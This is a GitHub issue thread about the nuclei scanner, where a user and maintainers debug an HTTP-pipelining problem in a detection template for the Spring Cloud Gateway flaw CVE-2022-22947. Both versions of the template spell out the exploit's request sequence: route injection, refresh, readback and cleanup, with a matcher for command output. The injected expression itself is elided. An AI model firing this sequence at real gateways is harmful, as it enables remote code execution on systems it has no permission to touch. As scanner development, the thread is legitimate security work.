search

projectdiscovery / nuclei

Nuclei is a fast, customizable vulnerability scanner powered by the global security community and built on a simple YAML-based DSL, enabling collaboration to tackle trending vulnerabilities on the internet. It helps you find vulnerabilities in your applications, APIs, networks, DNS, and cloud configurations.
https://docs.projectdiscovery.io/tools/nuclei
MIT License
20.52k stars 2.5k forks source link

[bug]Send multiple HTTP packets at a time, unable to get the return data #2099

Closed hktalent closed 2 years ago

hktalent commented 2 years ago

1、burp send is ok

image

2、Send multiple HTTP packets at a time, unable to get the return data

how test git clone https://github.com/vulhub/vulhub cd vulhub/spring/CVE-2022-22947 docker-compose up -d

id: CVE-2022-22947

info:
  name: spring_cloud_gateway_CVE_2022_22947
  author: 51pwn
  severity: high
  reference:
    - https://github.com/hktalent
    - https://51pwn.com
  tags: spring,CVE-2022-22947

requests:
  - raw:
      - |+
        POST /actuator/gateway/routes/hack_51pwn_com HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Pragma:no-cache
        Content-Type: application/json
        Connection: keep-alive
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
        Content-Length: 333

        {
          "id": "hacktest",
          "filters": [{
            "name": "AddResponseHeader",
            "args": {"name": "Result","value": "....."}
            }],
          "uri": "https://51pwn.com",
          "order": 0
        }
        POST /actuator/gateway/refresh HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Connection: keep-alive
        Pragma:no-cache
        Content-Type: application/x-www-form-urlencoded
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

        GET /actuator/gateway/routes/hack_51pwn_com HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Connection: keep-alive
        Pragma:no-cache
        Content-Type: application/x-www-form-urlencoded
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

        DELETE /actuator/gateway/routes/hack_51pwn_com HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Connection: keep-alive
        Pragma:no-cache
        Content-Type: application/x-www-form-urlencoded
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

        POST /actuator/gateway/refresh HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Connection: close
        Pragma:no-cache
        Content-Type: application/x-www-form-urlencoded
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

      # end payload
    unsafe: true
    # matchers-condition: or
    matchers:
      - type: regex
        regex:
          - "(uid=.{3,})"
    extractors:
      - type: regex
        part: body
        name: xxxx
        regex:
          - "(uid=[^\\n]{10,})"

Send multiple HTTP packets at a time, unable to get the return data

geeknik commented 2 years ago

Maybe not a bug? Try this edit and let me know if it fixes your problem.

id: CVE-2022-22947

info:
  name: spring_cloud_gateway_CVE_2022_22947
  author: 51pwn
  severity: high
  reference:
    - https://github.com/hktalent
    - https://51pwn.com
  tags: spring,CVE-2022-22947

requests:
  - raw:
      - |+
        POST /actuator/gateway/routes/hack_51pwn_com HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Pragma:no-cache
        Content-Type: application/json
        Connection: keep-alive
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
        Content-Length: 333

        {
          "id": "hacktest",
          "filters": [{
            "name": "AddResponseHeader",
            "args": {"name": "Result","value": "....."}
            }],
          "uri": "https://51pwn.com",
          "order": 0
        }

      - |+
        POST /actuator/gateway/refresh HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Connection: keep-alive
        Pragma:no-cache
        Content-Type: application/x-www-form-urlencoded
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

      - |+
        GET /actuator/gateway/routes/hack_51pwn_com HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Connection: keep-alive
        Pragma:no-cache
        Content-Type: application/x-www-form-urlencoded
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

      - |+
        DELETE /actuator/gateway/routes/hack_51pwn_com HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Connection: keep-alive
        Pragma:no-cache
        Content-Type: application/x-www-form-urlencoded
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

      - |+
        POST /actuator/gateway/refresh HTTP/1.1
        Host: {{Hostname}}
        Accept:*/*
        Connection: close
        Pragma:no-cache
        Content-Type: application/x-www-form-urlencoded
        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36

    # end payload
    cookie-reuse: true
    req-condition: true
    unsafe: true
    # matchers-condition: or
    matchers:
      - type: regex
        regex:
          - "(uid=.{3,})"
    extractors:
      - type: regex
        part: body
        name: xxxx
        regex:
          - "(uid=[^\\n]{10,})"
hktalent commented 2 years ago

@ehsandeep @geeknik thanks I know it is possible to split multiple requests The case does not need cookies. Although it has not been resolved, thank you very much

I want to use the HTTP protocol feature to send at one time to reduce network interaction

use -debug It is found that the packet can be sent correctly, but only the first requested data is received

[DBG] [CVE-2022-22947] Dumped HTTP response http://127.0.0.1:8080

HTTP/1.1 201 Created
Location: /routes/hack_51pwn_com
content-length: 0
Content-Length: 0

[INF] No results found. Better luck next time!
hktalent commented 2 years ago

HTTP pipelining reference

hktalent commented 2 years ago

HTTP pipelining reference

geeknik commented 2 years ago

https://nuclei.projectdiscovery.io/templating-guide/protocols/http/#pipelining

hktalent commented 2 years ago

@geeknik use

pipeline: true
pipeline-concurrent-connections: 40
pipeline-requests-per-connection: 25000

same, cannot work

image
ehsandeep commented 2 years ago

@hktalent From https://en.wikipedia.org/wiki/HTTP_pipelining

Despite this requirement, many legacy HTTP/1.1 servers do not support pipelining correctly, forcing most HTTP clients to not use HTTP pipelining in practice.

It's a feature that depends on the server to support, nuclei do support sending pipeline request as mentioned above, but it's not usable unless the server supports it, and most probably you going to miss lots of vulnerable target in this way.

Closing the issue as this is not a bug.

hktalent commented 2 years ago

@ehsandeep thanks, but use burp is ok,This indicates that the server is supported,But nucleionly gets the return of the first request